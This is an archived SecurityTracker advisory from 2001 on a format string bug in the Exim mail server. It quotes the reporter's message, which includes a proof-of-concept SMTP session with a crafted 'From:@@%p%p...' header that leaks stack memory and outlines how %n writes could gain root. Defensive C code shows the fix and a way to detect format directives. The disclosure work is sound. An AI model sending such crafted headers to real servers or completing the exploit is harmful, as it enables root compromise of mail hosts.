SecurityTracker.com
SecurityTracker
Archives
Category:   Application (E-mail Server)  >   Exim
Vendors:   Exim.org
Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
SecurityTracker Alert ID:  1001694
SecurityTracker URL:  http://securitytracker.com/id/1001694
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 6 2001
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes

Description:   A format string vulnerability has been reported in the Exim mail server that may allow a remote user to execute arbitrary code on the server.

It is reported that the vulnerability can only be triggered when Exim is configured to check incoming mail headers for proper syntax. This is enabled through the headers_check_syntax option in /etc/exim.conf. By default, this option is not set.

The vulnerability reportedly exists in the accept.c module, where the SMTP reply string (which can include content taken from the offending header) is passed to the moan_smtp_batch() function as its format argument.

A demonstration exploit transcript is provided in the Source Message.

Impact:   A remote user can execute arbitrary code on the server with root-level privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.exim.org/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Debian Releases Fix) Re: Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
Debian has released a fix.
(Conectiva Issues Fix) Re: Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
Conectiva has issued a fix.
(Red Hat Provides Fix) Re: Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
Red Hat has provided a fix.



 Source Message Contents

Subject:  lil' exim format bug


Hi BugTrackers

Just a little bug to tell:


THE BUG
-------

accept.c, line 2506:
	else if (smtp_reply != NULL) moan_smtp_batch(NULL, smtp_reply);

while moan_smtp_batch is like this:
	moan_smtp_batch(char *cmd_buffer, char *format, ...)

So when smtp_reply contains format strings, it gets transformed by
moan_smtp_batch().


Why did I say that it's a little bug?
-------------------------------------

This piece of code is only executed when exim is configured to check incoming mails' headers:
/etc/exim.conf should have an option set:
headers_check_syntax

By default it's turned OFF.
Only a few people turn it on.

So it's NOT vulnerable BY DEFAULT.


Exploitation:
-------------

Try this:
===8<======8<=======8<======
lez:~$ /usr/sbin/exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p

.
===8<======8<=======8<=======

Somewhere in the answers you should see:
550 Syntax error in 'From' header: domain missing or malformed: failing address is: @@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40

If you change %p's to %s's, you get a segfault. With a carefully constructed thing, it's easy to overwrite the saved eip with %n's, and get root out of this bug.

No exploit yet, but after the many local format bug exploits it's not much work to write one for a skilled man.
-- 
Megyer Laszlo (Lez)
lez@sch.bme.hu
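The defect described above is a user-influenced string reaching the format parameter of a variadic routine. The following C snippet is an added illustration, not Exim's code: report_smtp_reply() is a hypothetical stand-in for a moan_smtp_batch()-style function, report_reply_safely() shows the corrected call pattern, and has_format_directive() is a simple check an operator could use to flag header values carrying conversion directives in logs.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for a variadic reporting routine shaped like
 * moan_smtp_batch(cmd_buffer, format, ...): formats its arguments into
 * a buffer and returns the length vsnprintf reports. */
static int report_smtp_reply(char *out, size_t outlen, const char *format, ...)
{
    va_list ap;
    va_start(ap, format);
    int n = vsnprintf(out, outlen, format, ap);
    va_end(ap);
    return n;
}

/* The pattern the advisory describes: the reply, which embeds text taken
 * from the rejected header, is itself used as the format string.  Any
 * '%' directives in it are interpreted, not printed.  Shown only for
 * contrast; the test below never calls it. */
int report_reply_unsafely(char *out, size_t outlen, const char *smtp_reply)
{
    return report_smtp_reply(out, outlen, smtp_reply);
}

/* Corrected pattern: the reply is passed as a *data* argument under a
 * fixed "%s" format, so '%' sequences in it are copied literally. */
int report_reply_safely(char *out, size_t outlen, const char *smtp_reply)
{
    return report_smtp_reply(out, outlen, "%s", smtp_reply);
}

/* Returns 1 if the string contains a printf-style conversion directive
 * (a '%' not immediately followed by another '%'), otherwise 0.  Useful
 * for flagging header values like "@@%p%p%p" when reviewing mail logs;
 * a literal "%%" is treated as an escaped percent sign. */
int has_format_directive(const char *s)
{
    for (; *s; s++) {
        if (*s == '%') {
            if (s[1] == '%') { s++; continue; }
            return 1;
        }
    }
    return 0;
}
```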



Copyright 2019, SecurityGlobal.net LLC